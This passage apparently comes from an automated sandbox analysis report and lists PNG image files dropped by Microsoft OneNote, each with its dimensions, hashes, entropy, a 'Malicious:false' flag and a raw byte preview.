                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
